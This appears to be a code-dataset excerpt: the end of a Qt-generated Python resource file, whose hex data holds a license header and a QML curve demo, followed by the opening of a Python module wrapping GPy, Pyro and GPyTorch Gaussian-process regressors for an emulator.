\x67\x69\x76\x65\x73\x20\x79\x6f\x75\x20\x63\x65\x72\x74\x61\x69\
\x6e\x20\x61\x64\x64\x69\x74\x69\x6f\x6e\x61\x6c\x0a\x2a\x2a\x20\
\x72\x69\x67\x68\x74\x73\x2e\x20\x20\x54\x68\x65\x73\x65\x20\x72\
\x69\x67\x68\x74\x73\x20\x61\x72\x65\x20\x64\x65\x73\x63\x72\x69\
\x62\x65\x64\x20\x69\x6e\x20\x74\x68\x65\x20\x44\x69\x67\x69\x61\
\x20\x51\x74\x20\x4c\x47\x50\x4c\x20\x45\x78\x63\x65\x70\x74\x69\
\x6f\x6e\x0a\x2a\x2a\x20\x76\x65\x72\x73\x69\x6f\x6e\x20\x31\x2e\
\x31\x2c\x20\x69\x6e\x63\x6c\x75\x64\x65\x64\x20\x69\x6e\x20\x74\
\x68\x65\x20\x66\x69\x6c\x65\x20\x4c\x47\x50\x4c\x5f\x45\x58\x43\
\x45\x50\x54\x49\x4f\x4e\x2e\x74\x78\x74\x20\x69\x6e\x20\x74\x68\
\x69\x73\x20\x70\x61\x63\x6b\x61\x67\x65\x2e\x0a\x2a\x2a\x0a\x2a\
\x2a\x20\x47\x4e\x55\x20\x47\x65\x6e\x65\x72\x61\x6c\x20\x50\x75\
\x62\x6c\x69\x63\x20\x4c\x69\x63\x65\x6e\x73\x65\x20\x55\x73\x61\
\x67\x65\x0a\x2a\x2a\x20\x41\x6c\x74\x65\x72\x6e\x61\x74\x69\x76\
\x65\x6c\x79\x2c\x20\x74\x68\x69\x73\x20\x66\x69\x6c\x65\x20\x6d\
\x61\x79\x20\x62\x65\x20\x75\x73\x65\x64\x20\x75\x6e\x64\x65\x72\
\x20\x74\x68\x65\x20\x74\x65\x72\x6d\x73\x20\x6f\x66\x20\x74\x68\
\x65\x20\x47\x4e\x55\x0a\x2a\x2a\x20\x47\x65\x6e\x65\x72\x61\x6c\
\x20\x50\x75\x62\x6c\x69\x63\x20\x4c\x69\x63\x65\x6e\x73\x65\x20\
\x76\x65\x72\x73\x69\x6f\x6e\x20\x33\x2e\x30\x20\x61\x73\x20\x70\
\x75\x62\x6c\x69\x73\x68\x65\x64\x20\x62\x79\x20\x74\x68\x65\x20\
\x46\x72\x65\x65\x20\x53\x6f\x66\x74\x77\x61\x72\x65\x0a\x2a\x2a\
\x20\x46\x6f\x75\x6e\x64\x61\x74\x69\x6f\x6e\x20\x61\x6e\x64\x20\
\x61\x70\x70\x65\x61\x72\x69\x6e\x67\x20\x69\x6e\x20\x74\x68\x65\
\x20\x66\x69\x6c\x65\x20\x4c\x49\x43\x45\x4e\x53\x45\x2e\x47\x50\
\x4c\x20\x69\x6e\x63\x6c\x75\x64\x65\x64\x20\x69\x6e\x20\x74\x68\
\x65\x0a\x2a\x2a\x20\x70\x61\x63\x6b\x61\x67\x69\x6e\x67\x20\x6f\
\x66\x20\x74\x68\x69\x73\x20\x66\x69\x6c\x65\x2e\x20\x20\x50\x6c\
\x65\x61\x73\x65\x20\x72\x65\x76\x69\x65\x77\x20\x74\x68\x65\x20\
\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x69\x6e\x66\x6f\x72\x6d\
\x61\x74\x69\x6f\x6e\x20\x74\x6f\x0a\x2a\x2a\x20\x65\x6e\x73\x75\
\x72\x65\x20\x74\x68\x65\x20\x47\x4e\x55\x20\x47\x65\x6e\x65\x72\
\x61\x6c\x20\x50\x75\x62\x6c\x69\x63\x20\x4c\x69\x63\x65\x6e\x73\
\x65\x20\x76\x65\x72\x73\x69\x6f\x6e\x20\x33\x2e\x30\x20\x72\x65\
\x71\x75\x69\x72\x65\x6d\x65\x6e\x74\x73\x20\x77\x69\x6c\x6c\x20\
\x62\x65\x0a\x2a\x2a\x20\x6d\x65\x74\x3a\x20\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x67\x6e\x75\x2e\x6f\x72\x67\x2f\x63\x6f\
\x70\x79\x6c\x65\x66\x74\x2f\x67\x70\x6c\x2e\x68\x74\x6d\x6c\x2e\
\x0a\x2a\x2a\x0a\x2a\x2a\x0a\x2a\x2a\x20\x24\x51\x54\x5f\x45\x4e\
\x44\x5f\x4c\x49\x43\x45\x4e\x53\x45\x24\x0a\x2a\x2a\x0a\x2a\x2a\
\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\
\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\
\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\
\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\
\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2f\x0a\x0a\x69\x6d\x70\
\x6f\x72\x74\x20\x51\x74\x51\x75\x69\x63\x6b\x20\x32\x2e\x30\x0a\
\x69\x6d\x70\x6f\x72\x74\x20\x43\x75\x73\x74\x6f\x6d\x47\x65\x6f\
\x6d\x65\x74\x72\x79\x20\x31\x2e\x30\x0a\x0a\x49\x74\x65\x6d\x20\
\x7b\x0a\x20\x20\x20\x20\x77\x69\x64\x74\x68\x3a\x20\x33\x30\x30\
\x0a\x20\x20\x20\x20\x68\x65\x69\x67\x68\x74\x3a\x20\x32\x30\x30\
\x0a\x0a\x20\x20\x20\x20\x42\x65\x7a\x69\x65\x72\x43\x75\x72\x76\
\x65\x20\x7b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x69\x64\x3a\x20\
\x6c\x69\x6e\x65\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x61\x6e\x63\
\x68\x6f\x72\x73\x2e\x66\x69\x6c\x6c\x3a\x20\x70\x61\x72\x65\x6e\
\x74\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x61\x6e\x63\x68\x6f\x72\
\x73\x2e\x6d\x61\x72\x67\x69\x6e\x73\x3a\x20\x32\x30\x0a\x0a\x20\
\x20\x20\x20\x20\x20\x20\x20\x70\x72\x6f\x70\x65\x72\x74\x79\x20\
\x72\x65\x61\x6c\x20\x74\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x53\
\x65\x71\x75\x65\x6e\x74\x69\x61\x6c\x41\x6e\x69\x6d\x61\x74\x69\
\x6f\x6e\x20\x6f\x6e\x20\x74\x20\x7b\x0a\x20\x20\x20\x20\x20\x20\
\x20\x20\x20\x20\x20\x20\x4e\x75\x6d\x62\x65\x72\x41\x6e\x69\x6d\
\x61\x74\x69\x6f\x6e\x20\x7b\x20\x74\x6f\x3a\x20\x31\x3b\x20\x64\
\x75\x72\x61\x74\x69\x6f\x6e\x3a\x20\x32\x30\x30\x30\x3b\x20\x65\
\x61\x73\x69\x6e\x67\x2e\x74\x79\x70\x65\x3a\x20\x45\x61\x73\x69\
\x6e\x67\x2e\x49\x6e\x4f\x75\x74\x51\x75\x61\x64\x20\x7d\x0a\x20\
\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x4e\x75\x6d\x62\x65\
\x72\x41\x6e\x69\x6d\x61\x74\x69\x6f\x6e\x20\x7b\x20\x74\x6f\x3a\
\x20\x30\x3b\x20\x64\x75\x72\x61\x74\x69\x6f\x6e\x3a\x20\x32\x30\
\x30\x30\x3b\x20\x65\x61\x73\x69\x6e\x67\x2e\x74\x79\x70\x65\x3a\
\x20\x45\x61\x73\x69\x6e\x67\x2e\x49\x6e\x4f\x75\x74\x51\x75\x61\
\x64\x20\x7d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
\x6c\x6f\x6f\x70\x73\x3a\x20\x41\x6e\x69\x6d\x61\x74\x69\x6f\x6e\
\x2e\x49\x6e\x66\x69\x6e\x69\x74\x65\x0a\x20\x20\x20\x20\x20\x20\
\x20\x20\x7d\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x70\x32\x3a\
\x20\x51\x74\x2e\x70\x6f\x69\x6e\x74\x28\x74\x2c\x20\x31\x20\x2d\
\x20\x74\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x70\x33\x3a\x20\
\x51\x74\x2e\x70\x6f\x69\x6e\x74\x28\x31\x20\x2d\x20\x74\x2c\x20\
\x74\x29\x0a\x20\x20\x20\x20\x7d\x0a\x0a\x20\x20\x20\x20\x54\x65\
\x78\x74\x20\x7b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x61\x6e\x63\
\x68\x6f\x72\x73\x2e\x62\x6f\x74\x74\x6f\x6d\x3a\x20\x6c\x69\x6e\
\x65\x2e\x62\x6f\x74\x74\x6f\x6d\x0a\x0a\x20\x20\x20\x20\x20\x20\
\x20\x20\x78\x3a\x20\x32\x30\x0a\x20\x20\x20\x20\x20\x20\x20\x20\
\x77\x69\x64\x74\x68\x3a\x20\x70\x61\x72\x65\x6e\x74\x2e\x77\x69\
\x64\x74\x68\x20\x2d\x20\x34\x30\x0a\x20\x20\x20\x20\x20\x20\x20\
\x20\x77\x72\x61\x70\x4d\x6f\x64\x65\x3a\x20\x54\x65\x78\x74\x2e\
\x57\x6f\x72\x64\x57\x72\x61\x70\x0a\x0a\x20\x20\x20\x20\x20\x20\
\x20\x20\x74\x65\x78\x74\x3a\x20\x22\x54\x68\x69\x73\x20\x63\x75\
\x72\x76\x65\x20\x69\x73\x20\x61\x20\x63\x75\x73\x74\x6f\x6d\x20\
\x73\x63\x65\x6e\x65\x20\x67\x72\x61\x70\x68\x20\x69\x74\x65\x6d\
\x2c\x20\x69\x6d\x70\x6c\x65\x6d\x65\x6e\x74\x65\x64\x20\x75\x73\
\x69\x6e\x67\x20\x47\x4c\x5f\x4c\x49\x4e\x45\x5f\x53\x54\x52\x49\
\x50\x22\x0a\x20\x20\x20\x20\x7d\x0a\x7d\x0a\
"
qt_resource_name = b"\
\x00\x0a\
\x04\xb1\xbb\xe8\
\x00\x73\
\x00\x63\x00\x65\x00\x6e\x00\x65\x00\x67\x00\x72\x00\x61\x00\x70\x00\x68\
\x00\x0e\
\x05\x35\x16\x99\
\x00\x63\
\x00\x75\x00\x73\x00\x74\x00\x6f\x00\x6d\x00\x67\x00\x65\x00\x6f\x00\x6d\x00\x65\x00\x74\x00\x72\x00\x79\
\x00\x08\
\x08\x01\x5a\x5c\
\x00\x6d\
\x00\x61\x00\x69\x00\x6e\x00\x2e\x00\x71\x00\x6d\x00\x6c\
"
qt_resource_struct_v1 = b"\
\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x01\
\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x02\
\x00\x00\x00\x1a\x00\x02\x00\x00\x00\x01\x00\x00\x00\x03\
\x00\x00\x00\x3c\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\
"
qt_resource_struct_v2 = b"\
\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x01\
\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x02\
\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x1a\x00\x02\x00\x00\x00\x01\x00\x00\x00\x03\
\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x3c\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\
\x00\x00\x01\x5a\x38\x00\xd4\xd8\
"
qt_version = QtCore.qVersion().split('.')
if qt_version < ['5', '8', '0']:
rcc_version = 1
qt_resource_struct = qt_resource_struct_v1
else:
rcc_version = 2
qt_resource_struct = qt_resource_struct_v2
def qInitResources():
QtCore.qRegisterResourceData(rcc_version, qt_resource_struct, qt_resource_name, qt_resource_data)
def qCleanupResources():
QtCore.qUnregisterResourceData(rcc_version, qt_resource_struct, qt_resource_name, qt_resource_data)
qInitResources()
| 55.47234 | 105 | 0.726833 | 3,074 | 13,036 | 3.069941 | 0.044567 | 0.11953 | 0.141147 | 0.185652 | 0.790294 | 0.748013 | 0.7158 | 0.673519 | 0.629331 | 0.601356 | 0 | 0.398962 | 0.024394 | 13,036 | 234 | 106 | 55.709402 | 0.343057 | 0.011583 | 0 | 0.087156 | 0 | 0.834862 | 0.000311 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0.009174 | false | 0 | 0.004587 | 0 | 0.013761 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 1 | 1 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
1c7dd4529c72238c35c6c6beb16e76f296a04548 | 32,968 | py | Python | src/gaussian_process.py | sambit-giri/emulator | daa8bc9df5ec804052423b11d0a1c7252a75f850 | [
"MIT"
] | null | null | null | src/gaussian_process.py | sambit-giri/emulator | daa8bc9df5ec804052423b11d0a1c7252a75f850 | [
"MIT"
] | null | null | null | src/gaussian_process.py | sambit-giri/emulator | daa8bc9df5ec804052423b11d0a1c7252a75f850 | [
"MIT"
] | null | null | null | import numpy as np
from sklearn.metrics import r2_score
import pickle
from . import helper_functions as hf
from time import time
from sklearn.model_selection import train_test_split
from sklearn.metrics import mean_squared_error
try: import GPy
except: print('Install GPy to use GPR_GPy and SparseGPR_GPy.')
try: import torch
except: print('Install PyTorch.')
try:
import pyro
import pyro.contrib.gp as gp
import pyro.distributions as dist
except:
print('Install Pyro to use GPR_pyro.')
try:
import gpytorch
except:
print('Install gpytorch to use GPR_GPyTorch.')
class GPR_GPy:
def __init__(self, max_iter=1000, max_f_eval=1000, kernel=None, verbose=True, n_restarts_optimizer=5, n_jobs=0):
# define kernel
self.kernel = kernel
self.max_iter = max_iter
self.max_f_eval = max_f_eval
self.verbose = verbose
self.n_jobs = n_jobs
self.n_restarts_optimizer = n_restarts_optimizer
def fit(self, X_train, y_train):
# check kernel
if self.kernel is None:
print('Setting kernel to Matern32.')
input_dim = X_train.shape[1]
# self.kernel = GPy.kern.Matern52(input_dim,ARD=True)
self.kernel = GPy.kern.Matern32(input_dim,ARD=True)
# create simple GP model
self.m = GPy.models.GPRegression(X_train,y_train,self.kernel)
# optimize
if self.n_restarts_optimizer:
self.m.optimize_restarts(
num_restarts=self.n_restarts_optimizer,
robust=False,
#verbose=self.verbose,
messages=self.verbose,
parallel=True if self.n_jobs else False,
num_processes=self.n_jobs if self.n_jobs else None,
max_f_eval=self.max_f_eval,
max_iters=self.max_iter,
)
else:
self.m.optimize(messages=self.verbose, max_f_eval=self.max_f_eval)
def predict(self, X_test, return_std=False):
y_pred, y_var = self.m.predict(X_test)
if return_std: return y_pred, np.sqrt(y_var)
return y_pred
def score(self, X_test, y_test):
y_pred, y_std = self.m.predict(X_test)
scr = r2_score(y_test, y_pred)
return scr
def save_model(self, filename, save_trainset=True):
# np.save(filename, self.m.param_array)
save_dict = {'kernel': self.m.kern.to_dict(), 'param_array': self.m.param_array}
if save_trainset:
save_dict['X'] = np.array(self.m.X)
save_dict['Y'] = np.array(self.m.Y)
pickle.dump(save_dict, open(filename, 'wb'))
print('Model parameters are saved.')
def load_model(self, filename, X=None, Y=None):
load_dict = pickle.load(open(filename, 'rb'))
self.kernel = GPy.kern.Kern.from_dict(load_dict['kernel'])
# self.num_inducing = load_dict['num_inducing']
if 'X' in load_dict.keys() and 'Y' in load_dict.keys():
X = load_dict['X']
Y = load_dict['Y']
else:
print('The file does not contain the training data.')
print('Please provide it to the load_model through X and Y parameters.')
return None
m_load = GPy.models.GPRegression(X, Y, initialize=False, kernel=self.kernel)
m_load.update_model(False)
m_load.initialize_parameter()
m_load[:] = load_dict['param_array']
m_load.update_model(True)
self.m = m_load
return m_load
class SparseGPR_GPy:
def __init__(self, max_iter=1000, max_f_eval=1000, kernel=None, verbose=True, n_restarts_optimizer=5, n_jobs=0, num_inducing=10):
# define kernel
self.kernel = kernel
self.max_iter = max_iter
self.max_f_eval = max_f_eval
self.verbose = verbose
self.n_jobs = n_jobs
self.n_restarts_optimizer = n_restarts_optimizer
self.num_inducing = num_inducing
def setup_model(self, X_train, y_train):
input_dim = X_train.shape[1]
# check kernel
if self.kernel is None:
print('Setting kernel to Matern32.')
# self.kernel = GPy.kern.Matern52(input_dim,ARD=True)
self.kernel = GPy.kern.Matern32(input_dim,ARD=True)
# define inducing points
# self.Z = np.random.rand(self.num_inducing,input_dim)*(X_train.max(axis=0)-X_train.min(axis=0))+X_train.min(axis=0)
# create simple GP model
# self.m = GPy.models.SparseGPRegression(X_train,y_train,Z=self.Z,kernel=self.kernel)
self.m = GPy.models.SparseGPRegression(X_train,y_train,num_inducing=self.num_inducing,kernel=self.kernel)
def fit(self, X_train, y_train):
self.setup_model(X_train, y_train)
# optimize
if self.n_restarts_optimizer:
self.m.optimize_restarts(
num_restarts=self.n_restarts_optimizer,
robust=False,
#verbose=self.verbose,
messages=self.verbose,
parallel=True if self.n_jobs else False,
num_processes=self.n_jobs if self.n_jobs else None,
max_f_eval=self.max_f_eval,
max_iters=self.max_iter,
)
else:
self.m.optimize(messages=self.verbose, max_f_eval=self.max_f_eval)
# if self.verbose:
# print(self.m)
return self.m
def predict(self, X_test, return_std=False):
y_pred, y_std = self.m.predict(X_test)
if return_std: return y_pred, y_std
return y_pred
def score(self, X_test, y_test):
y_pred, y_std = self.m.predict(X_test)
scr = r2_score(y_test, y_pred)
return scr
def save_model(self, filename, save_trainset=True):
# np.save(filename, self.m.param_array)
save_dict = {'kernel': self.m.kern.to_dict(), 'param_array': self.m.param_array, 'num_inducing': self.num_inducing}
if save_trainset:
save_dict['X'] = np.array(self.m.X)
save_dict['Y'] = np.array(self.m.Y)
pickle.dump(save_dict, open(filename, 'wb'))
print('Model parameters are saved.')
def load_model(self, filename, X=None, Y=None):
load_dict = pickle.load(open(filename, 'rb'))
self.kernel = GPy.kern.Kern.from_dict(load_dict['kernel'])
self.num_inducing = load_dict['num_inducing']
if 'X' in load_dict.keys() and 'Y' in load_dict.keys():
X = load_dict['X']
Y = load_dict['Y']
else:
print('The file does not contain the training data.')
print('Please provide it to the load_model through X and Y parameters.')
return None
m_load = GPy.models.SparseGPRegression(X, Y, initialize=False, num_inducing=self.num_inducing, kernel=self.kernel)
m_load.update_model(False)
m_load.initialize_parameter()
m_load[:] = load_dict['param_array']
m_load.update_model(True)
self.m = m_load
return m_load
class SVGPR_GPy:
def __init__(self, max_iter=1000, max_f_eval=1000, kernel=None, verbose=True, n_restarts_optimizer=5, n_jobs=0, num_inducing=10):
# define kernel
self.kernel = kernel
self.max_iter = max_iter
self.max_f_eval = max_f_eval
self.verbose = verbose
self.n_jobs = n_jobs
self.n_restarts_optimizer = n_restarts_optimizer
self.num_inducing = num_inducing
def fit(self, X_train, y_train):
input_dim = X_train.shape[1]
# check kernel
if self.kernel is None:
print('Setting kernel to Matern32.')
# self.kernel = GPy.kern.Matern52(input_dim,ARD=True)
self.kernel = GPy.kern.Matern32(input_dim,ARD=True)
# define inducing points
#self.Z = np.random.rand(self.num_inducing,input_dim)*(X_train.max(axis=0)-X_train.min(axis=0))+X_train.min(axis=0)
# create simple GP model
self.m = GPy.models.SparseGPRegression(X,y,num_inducing=self.num_inducing,kernel=self.kernel)
# optimize
if self.n_restarts_optimizer:
self.m.optimize_restarts(
num_restarts=self.n_restarts_optimizer,
robust=False,
#verbose=self.verbose,
messages=self.verbose,
parallel=True if self.n_jobs else False,
num_processes=self.n_jobs if self.n_jobs else None,
max_f_eval=self.max_f_eval,
max_iters=self.max_iter,
)
else:
self.m.optimize(messages=self.verbose, max_f_eval=self.max_f_eval)
def predict(self, X_test, return_std=False):
y_pred, y_std = self.m.predict(X_test)
if return_std: return y_pred, y_std
return y_pred
def score(self, X_test, y_test):
y_pred, y_std = self.m.predict(X_test)
scr = r2_score(y_test, y_pred)
return scr
class GPR_pyro:
def __init__(self, max_iter=1000, tol=0.01, kernel=None, loss_fn=None, verbose=True, n_restarts_optimizer=5, n_jobs=0, estimate_method='MLE', learning_rate=1e-3):
# define kernel
self.kernel = kernel
self.max_iter = max_iter
self.verbose = verbose
self.n_jobs = n_jobs
self.n_restarts_optimizer = n_restarts_optimizer
self.estimate_method = estimate_method
self.learning_rate = learning_rate
self.loss_fn = loss_fn
self.tol = tol
def fit(self, train_x, train_y):
if type(train_x)==np.ndarray: train_x = torch.from_numpy(train_x)
if type(train_y)==np.ndarray: train_y = torch.from_numpy(train_y)
# check kernel
if self.kernel is None:
print('Setting kernel to Matern32.')
input_dim = train_x.shape[1]
self.kernel = gp.kernels.Matern32(input_dim, variance=None, lengthscale=None, active_dims=None)
# create simple GP model
self.model = gp.models.GPRegression(train_x, train_y, self.kernel)
# optimize
self.optimizer = torch.optim.Adam(self.model.parameters(), lr=self.learning_rate)
if self.loss_fn is None: self.loss_fn = pyro.infer.Trace_ELBO().differentiable_loss
self.losses = np.array([])
n_wait, max_wait = 0, 5
for i in range(self.max_iter):
self.optimizer.zero_grad()
loss = self.loss_fn(self.model.model, self.model.guide)
loss.backward()
self.optimizer.step()
self.losses = np.append(self.losses,loss.item())
print(i+1, loss.item())
dloss = self.losses[-1]-self.losses[-2]
if 0<=dloss and dloss<self.tol: n_wait += 1
else: n_wait = 0
if self.n_wait>=self.max_wait: break
def predict(self, X_test, return_std=True, return_cov=False):
y_mean, y_cov = self.model(X_test, full_cov=True, noiseless=False)
if return_std:
y_std = cov.diag().sqrt()
return y_pred, y_std
if return_cov: return y_pred, y_cov
return y_pred
def score(self, X_test, y_test):
y_pred = self.predict(X_test, return_std=False, return_cov=False)
scr = r2_score(y_test, y_pred)
return scr
class SparseGPR_pyro:
def __init__(self, max_iter=1000, tol=0.001, kernel=None, error_fn=None, loss_fn=None, verbose=True, n_Xu=10, n_jobs=0, estimate_method='MLE', learning_rate=1e-3, method='VFE', n_restarts_optimizer=5, validation=0.1):
# define kernel
self.kernel = kernel
self.max_iter = max_iter
self.verbose = verbose
self.n_jobs = n_jobs
self.n_restarts_optimizer = n_restarts_optimizer
self.estimate_method = estimate_method
self.learning_rate = learning_rate
self.loss_fn = loss_fn
self.tol = tol
self.n_Xu = n_Xu
self.method = method
self.error_fn = mean_squared_error if error_fn is None else error_fn
self.validation = validation
# # Initialise output
self.model = None
self.losses = None
self.optimizer = None
self.continue_run = False
self.train_err = None
self.valid_err = None
def fit_1out(self, train_x, train_y, n_Xu=None, past_info=None):
if n_Xu is not None: self.n_Xu = n_Xu
if self.validation is not None:
if type(train_x)!=np.ndarray: train_x = train_x.detach().numpy()
if type(train_y)!=np.ndarray: train_y = train_y.detach().numpy()
train_x, valid_x, train_y, valid_y = train_test_split(train_x, train_y, test_size=self.validation, random_state=42)
valid_x = torch.from_numpy(valid_x)
if type(train_x)==np.ndarray: train_x = torch.from_numpy(train_x)
if type(train_y)==np.ndarray: train_y = torch.from_numpy(train_y)
# check kernel
if self.kernel is None:
print('Setting kernel to Matern32.')
input_dim = train_x.shape[1]
self.kernel = gp.kernels.Matern32(input_dim, variance=None, lengthscale=None, active_dims=None)
self.Xu = np.linspace(train_x.min(axis=0)[0].data.numpy(), train_x.max(axis=0)[0].data.numpy(), self.n_Xu)
self.Xu = torch.from_numpy(self.Xu)
# create simple GP model
model = gp.models.SparseGPRegression(train_x, train_y, self.kernel, Xu=self.Xu, jitter=1.0e-5, approx=self.method) if past_info is None else past_info['model']
# optimize
optimizer = torch.optim.Adam(model.parameters(), lr=self.learning_rate) if past_info is None else past_info['optimizer']
if self.loss_fn is None: self.loss_fn = pyro.infer.Trace_ELBO().differentiable_loss
losses = np.array([]) if past_info is None else past_info['losses']
tr_err, vl_err = 10000, 10000
if self.validation is not None:
train_err = np.array([]) if past_info is None else past_info['train_err']
valid_err = np.array([]) if past_info is None else past_info['valid_err']
n_wait, max_wait = 0, 5
for i in range(losses.size,self.max_iter):
optimizer.zero_grad()
loss = self.loss_fn(model.model, model.guide)
loss.backward()
optimizer.step()
losses = np.append(losses,loss.item())
if self.validation is not None:
# print(type(train_y))
tr_err = self.error_fn(train_y.detach().numpy(), model(train_x, full_cov=False)[0].detach().numpy())
vl_err = self.error_fn(valid_y, model(valid_x, full_cov=False)[0].detach().numpy())
train_err = np.append(train_err, tr_err)
valid_err = np.append(valid_err, vl_err)
if self.verbose:
hf.loading_verbose(' ')
hf.loading_verbose('{0} | loss={1:.2f} | train_error={2:.3f} | validation_error={2:.3f}'.format(i+1, loss.item(), tr_err, vl_err))
dloss = losses[-1]-losses[-2] if len(losses)>2 else self.tol*1000
if 0<=dloss and dloss<self.tol: n_wait += 1
else: n_wait = 0
if n_wait>=max_wait: break
if self.validation is not None: return model, optimizer, losses, train_err, valid_err
return model, optimizer, losses
def fit(self, train_x, train_y, n_Xu=None):
if n_Xu is not None: self.n_Xu = n_Xu
if type(train_x)==np.ndarray: train_x = torch.from_numpy(train_x)
if type(train_y)==np.ndarray: train_y = torch.from_numpy(train_y)
# check kernel
if self.kernel is None:
print('Setting kernel to Matern32.')
input_dim = train_x.shape[1]
self.kernel = gp.kernels.Matern32(input_dim, variance=None, lengthscale=None, active_dims=None)
if self.model is not None: self.continue_run = True
tstart = time()
if train_y.ndim==1:
if self.validation is not None:
past_info = {'model':self.model, 'losses':self.losses, 'optimizer':self.optimizer, 'train_err': self.train_err, 'valid_err':self.valid_err} if self.continue_run else None
model, optimizer, losses, train_err, valid_err = self.fit_1out(train_x, train_y, past_info=past_info)
self.model, self.optimizer, self.losses, self.train_err, self.valid_err = model, optimizer, losses, train_err, valid_err
tend = time()
else:
past_info = {'model':self.model, 'losses':self.losses, 'optimizer':self.optimizer} if self.continue_run else None
model, optimizer, losses = self.fit_1out(train_x, train_y, past_info=past_info)
self.model, self.optimizer, self.losses = model, optimizer, losses
tend = time()
print('\n...done | Time elapsed: {:.2f} s'.format(tend-tstart))
else:
if self.validation is not None:
if self.model is None:
self.model, self.optimizer, self.losses, self.train_err, self.valid_err = {}, {}, {}, {}, {}
for i in range(train_y.shape[1]):
print('Regressing output variable {}'.format(i+1))
past_info = {'model':self.model[i], 'losses':self.losses[i], 'optimizer':self.optimizer[i], 'train_err': self.train_err[i], 'valid_err':self.valid_err[i]} if self.continue_run else None
model, optimizer, losses, train_err, valid_err = self.fit_1out(train_x, train_y[:,i], past_info=past_info)
self.model[i], self.optimizer[i], self.losses[i], self.train_err[i], self.valid_err[i] = model, optimizer, losses, train_err, valid_err
tend = time()
print('\n...done | Time elapsed: {:.2f} s'.format(tend-tstart))
else:
if self.model is None:
self.model, self.optimizer, self.losses = {}, {}, {}
for i in range(train_y.shape[1]):
print('Regressing output variable {}'.format(i+1))
past_info = {'model':self.model[i], 'losses':self.losses[i], 'optimizer':self.optimizer[i]} if self.continue_run else None
model, optimizer, losses = self.fit_1out(train_x, train_y[:,i], past_info=past_info)
self.model[i], self.optimizer[i], self.losses[i] = model, optimizer, losses
tend = time()
print('\n...done | Time elapsed: {:.2f} s'.format(tend-tstart))
def predict_1out(self, X_test, return_std=True, return_cov=False):
if type(X_test)==np.ndarray: X_test = torch.from_numpy(X_test)
y_mean, y_cov = self.model(X_test, full_cov=True, noiseless=False)
if return_std:
y_std = y_cov.diag().sqrt()
return y_mean.detach().numpy(), y_std.detach().numpy()
if return_cov: return y_mean.detach().numpy(), y_cov.detach().numpy()
return y_mean.detach().numpy()
def predict(self, X_test, return_std=True, return_cov=False):
if type(X_test)==np.ndarray: X_test = torch.from_numpy(X_test)
if type(self.model) is dict:
y_mean, y_cov = [], []
for i in range(len(self.model)):
y_mean0, y_cov0 = self.model[i](X_test, full_cov=True, noiseless=False)
y_mean.append(y_mean0.detach().numpy())
y_cov.append(y_cov0.detach().numpy())
if return_std:
y_std = [np.sqrt(np.diag(y_cov1)) for y_cov1 in y_cov]
return np.array(y_mean).T, np.array(y_std).T
if return_cov: return np.array(y_mean).T, np.array(y_cov).T
return np.array(y_mean).T
def score(self, X_test, y_test):
if type(X_test)==np.ndarray: X_test = torch.from_numpy(X_test)
if type(y_test)==torch.Tensor: y_test = y_test.detach().numpy()
y_pred = self.predict(X_test, return_std=False, return_cov=False)
scr = r2_score(y_test, y_pred)
return scr
class GPR_GPyTorch:
def __init__(self, max_iter=1000, tol=0.01, kernel=None, loss_fn=None, verbose=True, learning_rate=1e-3, optimizer=None, validation=0.1):
# define kernel
self.kernel = kernel
self.max_iter = max_iter
self.verbose = verbose
self.learning_rate = learning_rate
self.loss_fn = loss_fn
self.tol = tol
self.optimizer = optimizer
# self.validation = validation
self.train_loss = []
self.valid_loss = []
def prepare_model(self, train_x, train_y, kernel=None):
multi_task = False
if train_y.ndim>1:
if train_y.shape[1]>1:
multi_task = True
if multi_task:
print('Model for Multivariate output.')
# We will use the GP model for multivariate output, exact inference
class MultitaskGPModel(gpytorch.models.ExactGP):
def __init__(self, train_x, train_y, likelihood):
super(MultitaskGPModel, self).__init__(train_x, train_y, likelihood)
self.mean_module = gpytorch.means.MultitaskMean(
gpytorch.means.ConstantMean(), num_tasks=train_y.shape[1]
)
self.covar_module = gpytorch.kernels.MultitaskKernel(
kernel, num_tasks=train_y.shape[1], rank=1
)
def forward(self, x):
mean_x = self.mean_module(x)
covar_x = self.covar_module(x)
return gpytorch.distributions.MultitaskMultivariateNormal(mean_x, covar_x)
# initialize likelihood and model
self.likelihood = gpytorch.likelihoods.MultitaskGaussianLikelihood(num_tasks=train_y.shape[1])
self.model = MultitaskGPModel(train_x, train_y, self.likelihood)
else:
# We will use the simplest form of GP model, exact inference
class ExactGPModel(gpytorch.models.ExactGP):
